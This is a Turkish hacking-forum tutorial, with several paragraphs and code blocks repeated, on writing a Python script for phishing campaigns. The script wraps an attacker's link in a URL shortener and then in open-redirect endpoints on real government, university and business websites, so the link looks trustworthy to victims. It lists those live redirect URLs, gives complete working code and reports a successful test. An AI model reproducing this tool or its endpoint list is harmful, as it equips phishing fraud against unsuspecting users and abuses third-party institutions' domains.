İyi günler Türk Hack Team ailesi.
Bugün phishing servislerimiz için sosyal mühendislikte kullanabileceğimiz url kısaltma uygulaması yazacağız.
Daha önceden forumda konularıma denk geldiyseniz, içeriklerimi olabildiğince basit ve özgün tutup, farklılaşabileceğimiz noktalara değinmeye çalışıyorum.
Ayrıca konu içerisinde ana konu olmasa bile, sonrasında ilginizi çekebilecek farklı noktalara değinmeye çalışıyorum.
Bundan dolayı kod yazmasanızda temel mantığı kavramanızı istiyorum.
Phishing için URL Adresleri Neden Önemli?
Phishing, temelinde x kişisini dolaylı yoldan kandırarak zararlı uygulama üzerinden işlem yapmasını sağlar. Fakat çoğu zaman kullandığımız URL adresleri istediğimiz domain'e sahip olmadığı için işin sosyal mühendislik tarafı zorlaşır ve x kişisini ikna etmek daha güç hale gelir.
Bundan dolayı x kişisi, bilinir bir URL'ye tıklarken daha rahat davranır, fakat ngrok linkleri gibi abuk subuk linklere tıklamaya çekimser yaklaşır. Çünkü URL random yazılmıştır ve güven vermez.
Ayrıca gov ve edu uzantılı domainler devlet ve üniversite kurumlarına ait olduğu için bu tarz URL adreslerine giderken de rahat davranabilirler. Bu tamamen x kişisinin kafasında kurduğu psikolojik bir yapıdır.
Ayrıca URL shortener gibi yapılar çok yaygın olduğu için x kişisi çoğu zaman bunlarında farkındadır. Bu tarz websitelere yaklaşırken çekimser davranabilir.
Yönlendirme Servisleri
Birçok website kendi içerisinde veya, kendi ihtiyacına göre içerisinde yönlendirme kodları barındırır. Örneğin bazı websiteler bunu seo için yaparken, üniversiteler akademik bağlantılara erişirken kendi domaini üzerinden bir yönlendirme ihtiyacı duyarlar. Çünkü ilgili akademik makaleyi okuyan insanların kendi websitesinden oraya eriştiğini karşı tarafa bildirmek isterler.
Bu durumda biz yönlendirme servislerini bulduğumuzda, bu yapıdan faydalanabiliriz. Örneğin kendi URL'mize gov, edu veya herhangi bir popüler domain üzerinden yönlendirme yapabiliriz. Böylece dikkatsiz bir kullanıcıyı phishing avımıza daha etkili bir şekilde düşürebiliriz.
KODLAYALIM!
Öncelikle ben google üzerinden kendi yazdığım basit bazı dorklar ile yönlendirme yapan edu, gov ve normal domainlere ait websiteler buldum.
Topladığım yönlendirme yapan websiteler şu şekilde:
Bugün phishing servislerimiz için sosyal mühendislikte kullanabileceğimiz url kısaltma uygulaması yazacağız.
Daha önceden forumda konularıma denk geldiyseniz, içeriklerimi olabildiğince basit ve özgün tutup, farklılaşabileceğimiz noktalara değinmeye çalışıyorum.
Ayrıca konu içerisinde ana konu olmasa bile, sonrasında ilginizi çekebilecek farklı noktalara değinmeye çalışıyorum.
Bundan dolayı kod yazmasanızda temel mantığı kavramanızı istiyorum.
Phishing için URL Adresleri Neden Önemli?
Phishing, temelinde x kişisini dolaylı yoldan kandırarak zararlı uygulama üzerinden işlem yapmasını sağlar. Fakat çoğu zaman kullandığımız URL adresleri istediğimiz domain'e sahip olmadığı için işin sosyal mühendislik tarafı zorlaşır ve x kişisini ikna etmek daha güç hale gelir.
Bundan dolayı x kişisi, bilinir bir URL'ye tıklarken daha rahat davranır, fakat ngrok linkleri gibi abuk subuk linklere tıklamaya çekimser yaklaşır. Çünkü URL random yazılmıştır ve güven vermez.
Ayrıca gov ve edu uzantılı domainler devlet ve üniversite kurumlarına ait olduğu için bu tarz URL adreslerine giderken de rahat davranabilirler. Bu tamamen x kişisinin kafasında kurduğu psikolojik bir yapıdır.
Ayrıca URL shortener gibi yapılar çok yaygın olduğu için x kişisi çoğu zaman bunlarında farkındadır. Bu tarz websitelere yaklaşırken çekimser davranabilir.
Yönlendirme Servisleri
Birçok website kendi içerisinde veya, kendi ihtiyacına göre içerisinde yönlendirme kodları barındırır. Örneğin bazı websiteler bunu seo için yaparken, üniversiteler akademik bağlantılara erişirken kendi domaini üzerinden bir yönlendirme ihtiyacı duyarlar. Çünkü ilgili akademik makaleyi okuyan insanların kendi websitesinden oraya eriştiğini karşı tarafa bildirmek isterler.
Bu durumda biz yönlendirme servislerini bulduğumuzda, bu yapıdan faydalanabiliriz. Örneğin kendi URL'mize gov, edu veya herhangi bir popüler domain üzerinden yönlendirme yapabiliriz. Böylece dikkatsiz bir kullanıcıyı phishing avımıza daha etkili bir şekilde düşürebiliriz.
KODLAYALIM!
Öncelikle ben google üzerinden kendi yazdığım basit bazı dorklar ile yönlendirme yapan edu, gov ve normal domainlere ait websiteler buldum.
Topladığım yönlendirme yapan websiteler şu şekilde:
Kod:
http://www.qizegypt.gov.eg/home/language/en?url=http://veltsi.edu.ee/redirect.php?url=
http://readinglists.nottingham.edu.cn/link?url=
https://communityimpact.com/newsletter-redirect.php?url=
http://www.restaurantlasarte.com/redirect.php?url=[
http://www.fbt.se/redirect.php?url=
http://sergiubaluta.com/site/redirect.php?url=
Farklı farklı websiteler olduğu için bu websitelerden bazıları http veya https protokolü yerine // kabul ediyor. Kodu yazarken buna göre URL adresimizi düzenleyeceğiz.
Öncelikle URL adreslerine liste içine liste gelecek şekilde kaydediyorum. İsterseniz json yapısıda kullanabilirsiniz. Liste içerisine liste gelmesinin sebebi protokolünü algılayabilmemiz için.
Python:
#1 = //
#0 = http veya https
url_list = [["http://www.qizegypt.gov.eg/home/language/en?url=",1],
["http://veltsi.edu.ee/redirect.php?url=",1],
["http://readinglists.nottingham.edu.cn/link?url=",0],
["https://communityimpact.com/newsletter-redirect.php?url=",0],
["http://www.restaurantlasarte.com/redirect.php?url=",1],
["http://www.fbt.se/redirect.php?url=",0],
["http://sergiubaluta.com/site/redirect.php?url=",0],
]
Ardından linki uzun tutmamak için ekstra bir url kısaltma servisi eklemek istiyorum. Bunun için pyshorteners kütüphanesinden faydalanacağım.
Buradan pyshorteners dökümantasyonuna ulaşabilirsiniz.
Python:
import pyshorteners
def urlshortener(url):
s = pyshorteners.Shortener()
shorturl = s.dagd.short(url)
return shorturl
Şimdi kullanıcıdan bir input alıp bunu bizim phishing URL adresimiz ile birleştirmemiz gerekiyor. Bunun için aşağıdaki gibi bir kod yazdım.
Python:
def Redirecter(url):
RedirectService = url_list[random.randrange(len(url_list))]
CheckProtocol = RedirectService[1]==0
if(CheckProtocol):
return RedirectService[0]+url
else:
url = url.replace("http:","").replace("https:","")
return RedirectService[0]+url
def UserInput():
url = input("URL Adresinizi Girin: ")
shorturl = UrlShortener(url)
tadaaa = Redirecter(shorturl)
print(tadaaa)
UserInput()
Kodun en son hali aşağıdaki gibidir.
Python:
import pyshorteners
import random
#1 = //
#0 = http veya https
url_list = [["http://www.qizegypt.gov.eg/home/language/en?url=",1],
["http://veltsi.edu.ee/redirect.php?url=",1],
["http://readinglists.nottingham.edu.cn/link?url=",0],
["https://communityimpact.com/newsletter-redirect.php?url=",0],
["http://www.restaurantlasarte.com/redirect.php?url=",1],
["http://www.fbt.se/redirect.php?url=",0],
["http://sergiubaluta.com/site/redirect.php?url=",0],
]
def UrlShortener(url):
s = pyshorteners.Shortener()
shorturl = s.dagd.short(url)
return shorturl
def Redirecter(url):
RedirectService = url_list[random.randrange(len(url_list))]
CheckProtocol = RedirectService[1]==0
if(CheckProtocol):
return RedirectService[0]+url
else:
url = url.replace("http:","").replace("https:","")
return RedirectService[0]+url
def UserInput():
url = input("URL Adresinizi Girin: ")
shorturl = UrlShortener(url)
tadaaa = Redirecter(shorturl)
print(tadaaa)
UserInput()
TEST Edelim !
Gördüğünüz gibi edu domaini üzerinden bir url adresimiz oluştu. URL'ye gidip çalışıp çalışmadığınız test edelim.
Evrekaaa! yukarıda network'u gördüğünüz gibi çalışıyor!
Farklı farklı websiteler olduğu için bu websitelerden bazıları http veya https protokolü yerine // kabul ediyor. Kodu yazarken buna göre URL adresimizi düzenleyeceğiz.
Öncelikle URL adreslerine liste içine liste gelecek şekilde kaydediyorum. İsterseniz json yapısıda kullanabilirsiniz. Liste içerisine liste gelmesinin sebebi protokolünü algılayabilmemiz için.
Python:
#1 = //
#0 = http veya https
url_list = [["http://www.qizegypt.gov.eg/home/language/en?url=",1],
["http://veltsi.edu.ee/redirect.php?url=",1],
["http://readinglists.nottingham.edu.cn/link?url=",0],
["https://communityimpact.com/newsletter-redirect.php?url=",0],
["http://www.restaurantlasarte.com/redirect.php?url=",1],
["http://www.fbt.se/redirect.php?url=",0],
["http://sergiubaluta.com/site/redirect.php?url=",0],
]Ardından linki uzun tutmamak için ekstra bir url kısaltma servisi eklemek istiyorum. Bunun için pyshorteners kütüphanesinden faydalanacağım.
Buradan pyshorteners dökümantasyonuna ulaşabilirsiniz.
Python:
import pyshorteners
def urlshortener(url):
s = pyshorteners.Shortener()
shorturl = s.dagd.short(url)
return shorturlŞimdi kullanıcıdan bir input alıp bunu bizim phishing URL adresimiz ile birleştirmemiz gerekiyor. Bunun için aşağıdaki gibi bir kod yazdım.
Python:
def Redirecter(url):
RedirectService = url_list[random.randrange(len(url_list))]
CheckProtocol = RedirectService[1]==0
if(CheckProtocol):
return RedirectService[0]+url
else:
url = url.replace("http:","").replace("https:","")
return RedirectService[0]+url
def UserInput():
url = input("URL Adresinizi Girin: ")
shorturl = UrlShortener(url)
tadaaa = Redirecter(shorturl)
print(tadaaa)
UserInput()Kodun en son hali aşağıdaki gibidir.
Python:
import pyshorteners
import random
#1 = //
#0 = http veya https
url_list = [["http://www.qizegypt.gov.eg/home/language/en?url=",1],
["http://veltsi.edu.ee/redirect.php?url=",1],
["http://readinglists.nottingham.edu.cn/link?url=",0],
["https://communityimpact.com/newsletter-redirect.php?url=",0],
["http://www.restaurantlasarte.com/redirect.php?url=",1],
["http://www.fbt.se/redirect.php?url=",0],
["http://sergiubaluta.com/site/redirect.php?url=",0],
]
def UrlShortener(url):
s = pyshorteners.Shortener()
shorturl = s.dagd.short(url)
return shorturl
def Redirecter(url):
RedirectService = url_list[random.randrange(len(url_list))]
CheckProtocol = RedirectService[1]==0
if(CheckProtocol):
return RedirectService[0]+url
else:
url = url.replace("http:","").replace("https:","")
return RedirectService[0]+url
def UserInput():
url = input("URL Adresinizi Girin: ")
shorturl = UrlShortener(url)
tadaaa = Redirecter(shorturl)
print(tadaaa)
UserInput()TEST Edelim !
Gördüğünüz gibi edu domaini üzerinden bir url adresimiz oluştu. URL'ye gidip çalışıp çalışmadığınız test edelim.
Evrekaaa! yukarıda network'u gördüğünüz gibi çalışıyor!
Kapanış
Umarım faydalı ve yön gösterici bir içerik olmuştur.
Eğer konu hoşunuza gittiyse aşağıdaki diğer konular ilginizi çekebilir.
Son düzenleme:
